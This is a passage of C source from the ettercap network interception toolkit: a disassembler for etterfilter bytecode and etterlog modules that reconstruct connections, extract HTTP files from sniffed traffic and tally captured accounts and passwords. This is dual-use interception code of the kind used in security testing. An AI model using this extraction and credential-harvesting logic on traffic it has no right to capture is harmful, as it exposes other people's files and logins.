USER_MSG("\t"); SLIST_FOREACH(c, &const_head, next) USER_MSG("%s ", c->name); USER_MSG("\n"); fclose(fc); } /* * return the value of a constant * * the value is integer32 and in host order */ int get_constant(char *name, u_int32 *value) { struct const_entry *c; SLIST_FOREACH(c, &const_head, next) { if (!strcmp(name, c->name)) { *value = c->value; return E_SUCCESS; } } return -E_NOTFOUND; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/utils/etterfilter/ef_test.c000664 000000 000000 00000022107 13711276346 020752 0ustar00rootroot000000 000000 /* etterfilter -- test module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #ifndef OS_WINDOWS #include #endif #include #include #include /* protos */ void test_filter(char *filename); void print_fop(struct filter_op *fop, u_int32 eip); static void print_test(struct filter_op *fop, u_int32 eip); static void print_assign(struct filter_op *fop, u_int32 eip); static void print_inc(struct filter_op *fop, u_int32 eip); static void print_dec(struct filter_op *fop, u_int32 eip); static void print_function(struct filter_op *fop, u_int32 eip); /*******************************************/ /* * test a binary filter against a given file */ void test_filter(char *filename) { struct filter_op *fop; struct filter_env *fenv; struct filter_list *flist; flist = NULL; u_int32 eip = 0; /*memset(fenv, 0, sizeof(struct filter_env));*/ /* load the file */ if (filter_load_file(filename, &flist, 1) != E_SUCCESS) { ef_exit(-1); } fenv = &flist->env; /* skip the header in the file */ fop = fenv->chain; USER_MSG("Disassebling \"%s\" content...\n\n", filename); /* loop all the instructions and print their content */ while (eip < (fenv->len / sizeof(struct filter_op)) ) { /* print the instruction */ print_fop(&fop[eip], eip); /* autoincrement the instruction pointer */ eip++; } USER_MSG("\n %d instructions decoded.\n\n", (int)(fenv->len / sizeof(struct filter_op))); ef_exit(0); } /* * helper functions to print instructions */ void print_fop(struct filter_op *fop, u_int32 eip) { switch (fop->opcode) { case FOP_TEST: print_test(fop, eip); break; case FOP_ASSIGN: print_assign(fop, eip); break; case FOP_INC: print_inc(fop, eip); break; case FOP_DEC: print_dec(fop, eip); break; case FOP_FUNC: print_function(fop, eip); break; case FOP_JMP: USER_MSG("%04lu: JUMP ALWAYS to %04d\n", (unsigned long)eip, fop->op.jmp); break; case FOP_JTRUE: USER_MSG("%04lu: JUMP IF TRUE to %04d\n", (unsigned long)eip, fop->op.jmp); break; case FOP_JFALSE: USER_MSG("%04lu: JUMP IF FALSE to %04d\n", (unsigned long)eip, fop->op.jmp); break; case FOP_EXIT: USER_MSG("%04lu: EXIT\n", (unsigned long)eip); break; default: USER_MSG("UNDEFINED OPCODE (%d) !!\n", fop->opcode); ef_exit(-1); break; } } void print_test(struct filter_op *fop, u_int32 eip) { switch(fop->op.test.op) { case FTEST_EQ: if (fop->op.test.size != 0) USER_MSG("%04lu: TEST level %d, offset %d, size %d, == %lu [%#x]\n", (unsigned long)eip, fop->op.test.level, fop->op.test.offset, fop->op.test.size, (unsigned long)fop->op.test.value, (unsigned int)fop->op.test.value); else USER_MSG("%04lu: TEST level %d, offset %d, \"%s\"\n", (unsigned long)eip, fop->op.test.level, fop->op.test.offset, fop->op.test.string); break; case FTEST_NEQ: if (fop->op.test.size != 0) USER_MSG("%04lu: TEST level %d, offset %d, size %d, != %lu [%#x]\n", (unsigned long)eip, fop->op.test.level, fop->op.test.offset, fop->op.test.size, (unsigned long)fop->op.test.value, (unsigned int)fop->op.test.value); else USER_MSG("%04lu: TEST level %d, offset %d, not \"%s\"\n", (unsigned long)eip, fop->op.test.level, fop->op.test.offset, fop->op.test.string); break; case FTEST_LT: USER_MSG("%04lu: TEST level %d, offset %d, size %d, < %lu [%#x]\n", (unsigned long)eip, fop->op.test.level, fop->op.test.offset, fop->op.test.size, (unsigned long)fop->op.test.value, (unsigned int)fop->op.test.value); break; case FTEST_GT: USER_MSG("%04lu: TEST level %d, offset %d, size %d, > %lu [%#x]\n", (unsigned long)eip, fop->op.test.level, fop->op.test.offset, fop->op.test.size, (unsigned long)fop->op.test.value, (unsigned int)fop->op.test.value); break; case FTEST_LEQ: USER_MSG("%04lu: TEST level %d, offset %d, size %d, <= %lu [%#x]\n", (unsigned long)eip, fop->op.test.level, fop->op.test.offset, fop->op.test.size, (unsigned long)fop->op.test.value, (unsigned int)fop->op.test.value); break; case FTEST_GEQ: USER_MSG("%04lu: TEST level %d, offset %d, size %d, >= %lu [%#x]\n", (unsigned long)eip, fop->op.test.level, fop->op.test.offset, fop->op.test.size, (unsigned long)fop->op.test.value, (unsigned int)fop->op.test.value); break; default: USER_MSG("%04lu: UNDEFINED TEST OPCODE (%d) !!\n", (unsigned long)eip, fop->op.test.op); break; } } void print_assign(struct filter_op *fop, u_int32 eip) { if (fop->op.assign.size != 0) USER_MSG("%04lu: ASSIGNMENT level %d, offset %d, size %d, value %lu [%#x]\n", (unsigned long)eip, fop->op.assign.level, fop->op.assign.offset, fop->op.assign.size, (unsigned long)fop->op.assign.value, (unsigned int)fop->op.assign.value); else USER_MSG("%04lu: ASSIGNMENT level %d, offset %d, string \"%s\"\n", (unsigned long)eip, fop->op.assign.level, fop->op.assign.offset, fop->op.assign.string); } void print_inc(struct filter_op *fop, u_int32 eip) { USER_MSG("%04lu: INCREMENT level %d, offset %d, size %d, value %lu [%#x]\n", (unsigned long)eip, fop->op.assign.level, fop->op.assign.offset, fop->op.assign.size, (unsigned long)fop->op.assign.value, (unsigned int)fop->op.assign.value); } void print_dec(struct filter_op *fop, u_int32 eip) { USER_MSG("%04lu: DECREMENT level %d, offset %d, size %d, value %lu [%#x]\n", (unsigned long)eip, fop->op.assign.level, fop->op.assign.offset, fop->op.assign.size, (unsigned long)fop->op.assign.value, (unsigned int)fop->op.assign.value); } void print_function(struct filter_op *fop, u_int32 eip) { switch (fop->op.func.op) { case FFUNC_SEARCH: USER_MSG("%04lu: SEARCH level %d, string \"%s\"\n", (unsigned long)eip, fop->op.func.level, fop->op.func.string); break; case FFUNC_REGEX: USER_MSG("%04lu: REGEX level %d, string \"%s\"\n", (unsigned long)eip, fop->op.func.level, fop->op.func.string); break; case FFUNC_PCRE: if (fop->op.func.replace) USER_MSG("%04lu: PCRE_REGEX level %d, string \"%s\", replace \"%s\"\n", (unsigned long)eip, fop->op.func.level, fop->op.func.string, fop->op.func.replace); else USER_MSG("%04lu: PCRE_REGEX level %d, string \"%s\"\n", (unsigned long)eip, fop->op.func.level, fop->op.func.string); break; case FFUNC_REPLACE: USER_MSG("%04lu: REPLACE \"%s\" --> \"%s\"\n", (unsigned long)eip, fop->op.func.string, fop->op.func.replace); break; case FFUNC_INJECT: USER_MSG("%04lu: INJECT \"%s\"\n", (unsigned long)eip, fop->op.func.string); break; case FFUNC_EXECINJECT: USER_MSG("%04lu: EXECINJECT \"%s\"\n", (unsigned long)eip, fop->op.func.string); break; case FFUNC_LOG: USER_MSG("%04lu: LOG to \"%s\"\n", (unsigned long)eip, fop->op.func.string); break; case FFUNC_DROP: USER_MSG("%04lu: DROP\n", (unsigned long)eip); break; case FFUNC_KILL: USER_MSG("%04lu: KILL\n", (unsigned long)eip); break; case FFUNC_MSG: USER_MSG("%04lu: MSG \"%s\"\n", (unsigned long)eip, fop->op.func.string); break; case FFUNC_EXEC: USER_MSG("%04lu: EXEC \"%s\"\n", (unsigned long)eip, fop->op.func.string); break; default: USER_MSG("%04lu: UNDEFINED FUNCTION OPCODE (%d)!!\n", (unsigned long)eip, fop->op.func.op); break; } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/utils/etterlog/000775 000000 000000 00000000000 13711276346 016447 5ustar00rootroot000000 000000 ettercap-0.8.3.1/utils/etterlog/el_analyze.c000664 000000 000000 00000011151 13711276346 020735 0ustar00rootroot000000 000000 /* etterlog -- analysis module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include void analyze_packet(void); void analyze_info(void); /*******************************************/ void analyze(void) { switch(EL_GBL->hdr.type) { case LOG_PACKET: analyze_packet(); break; case LOG_INFO: analyze_info(); break; } } /* analyze a packet log file */ void analyze_packet(void) { struct log_header_packet pck; int ret, count = 0; int tot_size, pay_size = 0; u_char *buf; struct stat st; fprintf(stdout, "\nAnalyzing the log file (one dot every 100 packets)\n"); tot_size = sizeof(struct log_global_header); /* read the logfile */ LOOP { memset(&pck, 0, sizeof(struct log_header_packet)); ret = get_packet(&pck, &buf); /* on error exit the loop */ if (ret != E_SUCCESS) break; count++; tot_size += sizeof(struct log_header_packet) + pck.len; pay_size += pck.len; if (count % 100 == 0) { fprintf(stderr, "."); fflush(stderr); } SAFE_FREE(buf); } /* get the file stat */ ret = stat(EL_GBL->logfile, &st); ON_ERROR(ret, -1, "Cannot stat file"); fprintf(stdout, "\n\n"); fprintf(stdout, "Log file size (compressed) : %d\n", (int)st.st_size); fprintf(stdout, "Log file size (uncompressed) : %d\n", tot_size); fprintf(stdout, "Compression ratio : %.2f %%\n\n", 100 - ((float)st.st_size * 100 / (float)tot_size) ); fprintf(stdout, "Effective payload size : %d\n", pay_size); fprintf(stdout, "Wasted percentage : %.2f %%\n\n", 100 - ((float)pay_size * 100 / (float)tot_size) ); fprintf(stdout, "Number of packets : %d\n", count); if (count != 0) fprintf(stdout, "Average size per packet : %d\n", pay_size / count ); fprintf(stdout, "\n"); return; } /* * extract data form the file * and create the host list */ void create_hosts_list(void) { struct log_header_info inf; int ret; struct dissector_info buf; /* read the logfile */ LOOP { memset(&inf, 0, sizeof(struct log_header_info)); memset(&buf, 0, sizeof(struct dissector_info)); ret = get_info(&inf, &buf); /* on error exit the loop */ if (ret != E_SUCCESS) break; profile_add_info(&inf, &buf); SAFE_FREE(buf.user); SAFE_FREE(buf.pass); SAFE_FREE(buf.info); SAFE_FREE(buf.banner); } } /* * analyze an info log file */ void analyze_info(void) { struct host_profile *h; struct open_port *o; struct active_user *u; TAILQ_HEAD(, host_profile) *hosts_list_head = get_host_list_ptr(); int nhl = 0, nhnl = 0, ngw = 0; int nports = 0, nusers = 0, nhosts = 0; /* create the hosts' list */ create_hosts_list(); TAILQ_FOREACH(h, hosts_list_head, next) { if (h->type & FP_HOST_LOCAL) nhl++; if (h->type & FP_HOST_NONLOCAL) nhnl++; if (h->type & FP_GATEWAY) ngw++; nhosts++; LIST_FOREACH(o, &(h->open_ports_head), next) { nports++; LIST_FOREACH(u, &(o->users_list_head), next) { nusers++; } } } fprintf(stdout, "\n\n"); fprintf(stdout, "Number of hosts (total) : %d\n\n", nhosts); fprintf(stdout, "Number of local hosts : %d\n", nhl); fprintf(stdout, "Number of non local hosts : %d\n", nhnl); fprintf(stdout, "Number of gateway : %d\n\n", ngw); fprintf(stdout, "Number of discovered services : %d\n", nports); fprintf(stdout, "Number of accounts captured : %d\n\n", nusers); fprintf(stdout, "\n"); return; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/utils/etterlog/el_conn.c000664 000000 000000 00000020262 13711276346 020232 0ustar00rootroot000000 000000 /* etterlog -- connections module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include struct conn_list { struct ip_addr L3_src; struct ip_addr L3_dst; u_int16 L4_src; u_int16 L4_dst; u_char L4_proto; struct stream_object so; SLIST_ENTRY(conn_list) next; }; static SLIST_HEAD(, conn_list) conn_list_head; /* we can use the same struct */ static struct conn_list conn_target; /* proto */ static int insert_table(struct log_header_packet *pck, char *buf); /*******************************************/ /* * create the list of connections */ void conn_table_create(void) { struct log_header_packet pck; int ret, count = 0; u_char *buf; if (EL_GBL->hdr.type == LOG_INFO) FATAL_ERROR("LOG_INFO files don't contain connections !"); fprintf(stdout, "\nCreating the connection table...\n"); /* read the logfile */ LOOP { ret = get_packet(&pck, &buf); /* on error exit the loop */ if (ret != E_SUCCESS) break; count += insert_table(&pck, (char*)buf); SAFE_FREE(buf); } fprintf(stdout, "\nFound %d connection...\n\n", count); } /* * display the connection list */ void conn_table_display(void) { struct conn_list *c; char proto[5]; char ipsrc[MAX_ASCII_ADDR_LEN]; char ipdst[MAX_ASCII_ADDR_LEN]; SLIST_FOREACH(c, &conn_list_head, next) { switch(c->L4_proto) { case NL_TYPE_TCP: strcpy(proto, "TCP"); break; case NL_TYPE_UDP: strcpy(proto, "UDP"); break; } ip_addr_ntoa(&c->L3_src, ipsrc); ip_addr_ntoa(&c->L3_dst, ipdst); fprintf(stdout, "%s: %s:%d <--> %s:%d\n", proto, ipsrc, ntohs(c->L4_src), ipdst, ntohs(c->L4_dst)); } fprintf(stdout, "\n\n"); return; } /* * insert a new connection in the list * if it isn't already there */ static int insert_table(struct log_header_packet *pck, char *buf) { struct conn_list *c; /* the packet should be compliant to the target specifications */ if (!is_target_pck(pck)) { return 0; } /* search if the connection is alread present */ SLIST_FOREACH(c, &conn_list_head, next) { /* form source to dest */ if (c->L4_proto == pck->L4_proto && c->L4_src == pck->L4_src && c->L4_dst == pck->L4_dst && !ip_addr_cmp(&c->L3_src, &pck->L3_src) && !ip_addr_cmp(&c->L3_dst, &pck->L3_dst)) { /* add to the stream (if necessary) */ if (EL_GBL_OPTIONS->decode) stream_add(&c->so, pck, buf); return 0; } /* form dest to source */ if (c->L4_proto == pck->L4_proto && c->L4_src == pck->L4_dst && c->L4_dst == pck->L4_src && !ip_addr_cmp(&c->L3_src, &pck->L3_dst) && !ip_addr_cmp(&c->L3_dst, &pck->L3_src)) { /* add to the stream (if necessary) */ if (EL_GBL_OPTIONS->decode) stream_add(&c->so, pck, buf); return 0; } } /* not found in the list... add it */ SAFE_CALLOC(c, 1, sizeof(struct conn_list)); c->L4_proto = pck->L4_proto; c->L4_src = pck->L4_src; c->L4_dst = pck->L4_dst; memcpy(&c->L3_src, &pck->L3_src, sizeof(struct ip_addr)); memcpy(&c->L3_dst, &pck->L3_dst, sizeof(struct ip_addr)); /* init the stream object */ stream_init(&c->so); /* add to the stream (if necessary) */ if (EL_GBL_OPTIONS->decode) stream_add(&c->so, pck, buf); SLIST_INSERT_HEAD(&conn_list_head, c, next); return 1; } /* * create the filter for the connection */ void filcon_compile(char *conn) { #define MAX_TOK 5 char valid[] = "1234567890.:TCPUDtcpud"; char *tok[MAX_TOK]; char *p; int i = 0; /* sanity check */ if (strlen(conn) != strspn(conn, valid)) FATAL_ERROR("CONNECTION contains invalid chars !"); /* CONN parsing */ for(p=strsep(&conn, ":"); p != NULL; p=strsep(&conn, ":")) { tok[i++] = strdup(p); /* bad parsing */ if (i > (MAX_TOK-1)) break; } if (i != MAX_TOK) FATAL_ERROR("Incorrect number of token (PROTO:IP:PORT:IP:PORT) in CONNECTION !!"); if (!strcasecmp(tok[0], "tcp")) conn_target.L4_proto = NL_TYPE_TCP; if (!strcasecmp(tok[0], "udp")) conn_target.L4_proto = NL_TYPE_UDP; /* source and dest ports */ conn_target.L4_src = htons(atoi(tok[2])); conn_target.L4_dst = htons(atoi(tok[4])); /* source and dest ip */ if (ip_addr_pton(tok[1], &conn_target.L3_src) != E_SUCCESS) FATAL_ERROR("Invalid IP address (%s)", tok[1]); if (ip_addr_pton(tok[3], &conn_target.L3_dst) != E_SUCCESS) FATAL_ERROR("Invalid IP address (%s)", tok[3]); /* free the data */ for(i=0; i < MAX_TOK; i++) SAFE_FREE(tok[i]); } /* * return 1 if the packet is compliant with the filter */ int is_conn(struct log_header_packet *pck, int *versus) { struct conn_list tmp; int proto = 0; int good = 0; memset(&tmp, 0, sizeof(struct conn_list)); /* if the conn_target is not initialized, accept all */ if (!memcmp(&conn_target, &tmp, sizeof(struct conn_list))) return 1; /* the protocol does not match */ if (conn_target.L4_proto == pck->L4_proto) proto = 1; /* * we have to check if the packet is complying with the filter * specified by the users. */ /* from source to dest */ if ( !ip_addr_cmp(&pck->L3_src, &conn_target.L3_src) && !ip_addr_cmp(&pck->L3_dst, &conn_target.L3_dst) && pck->L4_src == conn_target.L4_src && pck->L4_dst == conn_target.L4_dst && /* the packet is from source, but we are interested only in dest */ !EL_GBL_OPTIONS->only_dest ) { good = 1; *versus = VERSUS_SOURCE; } /* from dest to source */ if ( !ip_addr_cmp(&pck->L3_src, &conn_target.L3_dst) && !ip_addr_cmp(&pck->L3_dst, &conn_target.L3_src) && pck->L4_src == conn_target.L4_dst && pck->L4_dst == conn_target.L4_src && /* the packet is from dest, but we are interested only in source */ !EL_GBL_OPTIONS->only_source ) { good = 1; *versus = VERSUS_DEST; } /* check the reverse option */ if (EL_GBL_OPTIONS->reverse ^ (good && proto) ) return 1; else return 0; return 1; } /* * decode a connection and extract files from the stream */ void conn_decode(void) { struct conn_list *c; char proto[5]; char ipsrc[MAX_ASCII_ADDR_LEN]; char ipdst[MAX_ASCII_ADDR_LEN]; int ret; /* walk thru the connections list */ SLIST_FOREACH(c, &conn_list_head, next) { switch(c->L4_proto) { case NL_TYPE_TCP: strcpy(proto, "TCP"); break; case NL_TYPE_UDP: strcpy(proto, "UDP"); break; } ip_addr_ntoa(&c->L3_src, ipsrc); ip_addr_ntoa(&c->L3_dst, ipdst); fprintf(stdout, "DECODING %s: %s:%d <--> %s:%d... ", proto, ipsrc, ntohs(c->L4_src), ipdst, ntohs(c->L4_dst)); fflush(stdout); /* extract the files from this connection */ ret = decode_stream(&c->so); if (ret == STREAM_SKIPPED) fprintf(stdout, " skipped.\n"); else fprintf(stdout, " done.\n"); } fprintf(stdout, "\n"); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/utils/etterlog/el_decode.c000664 000000 000000 00000011041 13711276346 020513 0ustar00rootroot000000 000000 /* etterlog -- decode a stream and extract file from it Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #ifdef HAVE_LIBGEN_H #include #endif #ifdef OS_WINDOWS #define MKDIR(path,acc) mkdir(path) #else #define MKDIR(path,acc) mkdir(path,acc) #endif /* globals */ static SLIST_HEAD (, dec_entry) extractor_table; struct dec_entry { u_int8 level; u_int32 type; FUNC_EXTRACTOR_PTR(extractor); SLIST_ENTRY (dec_entry) next; }; /*******************************************/ /* * decode the stream */ int decode_stream(struct stream_object *so) { struct so_list *pl; FUNC_EXTRACTOR_PTR(app_extractor); int ret = 0; /* get the port used by the stream, looking at the first packet */ pl = TAILQ_FIRST(&so->so_head); /* * we should run the extractor on both the tcp/udp ports * since we may be interested in both client and server traffic. */ switch (pl->po.L4.proto) { case NL_TYPE_TCP: app_extractor = get_extractor(APP_LAYER_TCP, ntohs(pl->po.L4.src)); EXECUTE_EXTRACTOR(app_extractor, so, ret); app_extractor = get_extractor(APP_LAYER_TCP, ntohs(pl->po.L4.dst)); EXECUTE_EXTRACTOR(app_extractor, so, ret); break; case NL_TYPE_UDP: app_extractor = get_extractor(APP_LAYER_UDP, ntohs(pl->po.L4.src)); EXECUTE_EXTRACTOR(app_extractor, so, ret); app_extractor = get_extractor(APP_LAYER_UDP, ntohs(pl->po.L4.dst)); EXECUTE_EXTRACTOR(app_extractor, so, ret); break; } /* if at least one extractor has found something ret is positive */ return ret; } /* * add a extractor to the extractors table */ void add_extractor(u_int8 level, u_int32 type, FUNC_EXTRACTOR_PTR(extractor)) { struct dec_entry *e; SAFE_CALLOC(e, 1, sizeof(struct dec_entry)); e->level = level; e->type = type; e->extractor = extractor; SLIST_INSERT_HEAD(&extractor_table, e, next); return; } /* * get a extractor from the extractors table */ void * get_extractor(u_int8 level, u_int32 type) { struct dec_entry *e; void *ret; SLIST_FOREACH (e, &extractor_table, next) { if (e->level == level && e->type == type) { ret = (void *)e->extractor; return ret; } } return NULL; } /* * open a file to write into. * the file are saved in a subdirectories structure like this: * - host * - proto * - stealed_file * e.g.: * - 192.168.0.1 * - HTTP * - images * - a.gif * - b.gif * - styles * - style.css * - index.html * - foo.php */ int decode_to_file(char *host, char *proto, char *file) { #define BASE_DIR "./decoded_files" char dir[1024]; char *p; char *path = strdup(file); char *filetmp = strdup(file); int fd; /* always create the base, host and proto directory */ strcpy(dir, BASE_DIR); MKDIR(dir, 0700); strlcat(dir, "/", sizeof(dir)); strlcat(dir, host, sizeof(dir)); MKDIR(dir, 0700); strlcat(dir, "/", sizeof(dir)); strlcat(dir, proto, sizeof(dir)); MKDIR(dir, 0700); /* now 'dir' contains "BASE_DIR/host/proto" */ /* parse the file to be created and create the required subdirectories */ for (p = strsep(&path, "/"); p != NULL; p = strsep(&path, "/")) { strlcat(dir, "/", sizeof(dir)); strlcat(dir, p, sizeof(dir)); /* the token is a directory, create it */ if (strcmp(p, basename(filetmp))) { MKDIR(dir, 0700); } else { /* exit the parsing and open the file */ break; } } /* actually open the file */ fd = open(dir, O_CREAT | O_TRUNC | O_RDWR | O_BINARY, 0600); SAFE_FREE(filetmp); SAFE_FREE(path); return fd; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/utils/etterlog/el_decode_http.c000664 000000 000000 00000010424 13711276346 021556 0ustar00rootroot000000 000000 /* etterlog -- extractor for http and proxy -- TCP 80, 8080 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include /* globals */ /* protos */ FUNC_EXTRACTOR(extractor_http); void http_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init http_init(void) { add_extractor(APP_LAYER_TCP, 80, extractor_http); add_extractor(APP_LAYER_TCP, 8080, extractor_http); } FUNC_EXTRACTOR(extractor_http) { char header[1024]; struct so_list *ret, *ret2; char host[MAX_ASCII_ADDR_LEN]; int len, fd; char* ptr; u_char *data; int client, server; /* get the ip address of the server where the file are coming from */ if (ntohs(STREAM->side1.so_curr->po.L4.dst) == 80) { ip_addr_ntoa(&STREAM->side1.so_curr->po.L3.dst, host); client = STREAM->side1.so_curr->side; } else { ip_addr_ntoa(&STREAM->side1.so_curr->po.L3.src, host); client = ~(STREAM->side1.so_curr->side); } server = ~client; /* * steal all the files found in the stream * we only extract files requested via the GET method */ do { ret = stream_search(STREAM, "GET ", 4, client); /* if found, read only from that direction */ if (ret != NULL) { stream_move(STREAM, 4, SEEK_CUR, client); memset(header, 0, sizeof(header)); stream_read(STREAM, (u_char*)header, 128, client); /* get the filename (until the first blank) */ if ( (ptr = strchr(header, ' ')) != NULL ) *ptr = '\0'; /* * the browser is requesting the root. * we save this in the index.html file */ if (!strcmp(header, "/")) strcpy(header, "/index.html"); /* open the file for writing */ fd = decode_to_file(host, "HTTP", header); ON_ERROR(fd, -1, "Cannot create file: %s", header); fprintf(stdout, "\n\tExtracting file: %s ", header); /* search the length of the file */ ret2 = stream_search(STREAM, "Content-Length: ", 16, server); /* we need content length, if not found, skip it */ if (ret2 == NULL) { close(fd); continue; } /* get the string until the \r */ stream_move(STREAM, 16, SEEK_CUR, server); stream_read(STREAM, (u_char*)header, 10, server); if ( (ptr = strchr(header, '\r')) != NULL ) *ptr = '\0'; len = atoi(header); fprintf(stdout, " %d bytes", len); /* search the end of the headers */ ret2 = stream_search(STREAM, "\r\n\r\n", 4, server); /* we need the end of the header, if not found, skip it */ if (ret2 == NULL) { close(fd); continue; } stream_move(STREAM, 4, SEEK_CUR, server); #if 0 memset(header, 0, sizeof(header)); stream_read(STREAM, header, 10, ret2->side); printf("header: [%s]\n", header); el_exit(0); #endif //continue; //printf(" move: %d", stream_move(STREAM, len, SEEK_CUR, ret2->side)); SAFE_CALLOC(data, len, sizeof(u_char)); stream_read(STREAM, data, len, server); write(fd, data, len); SAFE_FREE(data); close(fd); } } while (ret != NULL); return STREAM_DECODED; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/utils/etterlog/el_display.c000664 000000 000000 00000022720 13711276346 020743 0ustar00rootroot000000 000000 /* etterlog -- display packets or infos Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include #include #include /* proto */ static void display_packet(void); static void display_info(void); static void display_headers(struct log_header_packet *pck); static int match_regex(struct host_profile *h); static void print_pass(struct host_profile *h); /*******************************************/ void display(void) { switch(EL_GBL->hdr.type) { case LOG_PACKET: display_packet(); break; case LOG_INFO: display_info(); break; } } /* display a packet log file */ static void display_packet(void) { struct log_header_packet pck; int ret; u_char *buf; u_char *tmp; int versus; /* read the logfile */ LOOP { ret = get_packet(&pck, &buf); /* on error exit the loop */ if (ret != E_SUCCESS) break; /* the packet should be compliant to the target specifications */ if (!is_target_pck(&pck)) { SAFE_FREE(buf); continue; } /* the packet should be compliant to the connection specifications */ if (!is_conn(&pck, &versus)) { SAFE_FREE(buf); continue; } /* if the regex does not match, the packet is not interesting */ if (EL_GBL_OPTIONS->regex && EL_GBL->regex && regexec(EL_GBL->regex, (const char*)buf, 0, NULL, 0) != 0) { SAFE_FREE(buf); continue; } /* * prepare the buffer, * the max length is hex_fomat * so use its length for the buffer */ SAFE_CALLOC(tmp, hex_len(pck.len), sizeof(u_char)); /* display the headers only if necessary */ if (!EL_GBL_OPTIONS->no_headers) display_headers(&pck); /* * format the packet with the function * set by the user */ ret = EL_GBL->format(buf, pck.len, tmp); /* the ANSI escape for the color */ if (EL_GBL_OPTIONS->color) { int color = 0; switch (versus) { case VERSUS_SOURCE: color = COL_GREEN; break; case VERSUS_DEST: color = COL_BLUE; break; } set_color(color); } /* sync stream/descriptor output and print the packet */ fflush(stdout); write(fileno(stdout), tmp, ret); if (EL_GBL_OPTIONS->color) reset_color(); SAFE_FREE(buf); SAFE_FREE(tmp); } if (!EL_GBL_OPTIONS->no_headers) fprintf(stdout, "\n\n"); return; } /* * display the packet headers */ static void display_headers(struct log_header_packet *pck) { char tmp1[MAX_ASCII_ADDR_LEN]; char tmp2[MAX_ASCII_ADDR_LEN]; char flags[8]; char *p = flags; char proto[5]; memset(flags, 0, sizeof(flags)); /* display the date. ec_ctime() has no newline at end. */ #if defined OS_DARWIN fprintf(stdout, "\n\n%s [%d]\n", ec_ctime(&pck->tv), pck->tv.tv_usec); #else fprintf(stdout, "\n\n%s [%lu]\n", ec_ctime(&pck->tv), pck->tv.tv_usec); #endif if (EL_GBL_OPTIONS->showmac) { /* display the mac addresses */ mac_addr_ntoa(pck->L2_src, tmp1); mac_addr_ntoa(pck->L2_dst, tmp2); fprintf(stdout, "%17s --> %17s\n", tmp1, tmp2); } /* calculate the flags */ if (pck->L4_flags & TH_SYN) *p++ = 'S'; if (pck->L4_flags & TH_FIN) *p++ = 'F'; if (pck->L4_flags & TH_RST) *p++ = 'R'; if (pck->L4_flags & TH_ACK) *p++ = 'A'; if (pck->L4_flags & TH_PSH) *p++ = 'P'; /* determine the proto */ switch(pck->L4_proto) { case NL_TYPE_TCP: strcpy(proto, "TCP"); break; case NL_TYPE_UDP: strcpy(proto, "UDP"); break; } /* display the ip addresses */ ip_addr_ntoa(&pck->L3_src, tmp1); ip_addr_ntoa(&pck->L3_dst, tmp2); fprintf(stdout, "%s %s:%d --> %s:%d | %s (%u)\n", proto, tmp1, ntohs(pck->L4_src), tmp2, ntohs(pck->L4_dst), flags, pck->len); } /* * compile the regex */ void set_display_regex(char *regex) { int err; char errbuf[100]; /* compile the regex */ err = regcomp(EL_GBL->regex, regex, REG_EXTENDED | REG_NOSUB | REG_ICASE ); if (err) { regerror(err, EL_GBL->regex, errbuf, sizeof(errbuf)); FATAL_ERROR("%s\n", errbuf); } } /* display an inf log file */ static void display_info(void) { struct host_profile *h; TAILQ_HEAD(, host_profile) *hosts_list_head = get_host_list_ptr(); /* create the hosts' list */ create_hosts_list(); /* don't load if the user is interested only in passwords... */ if 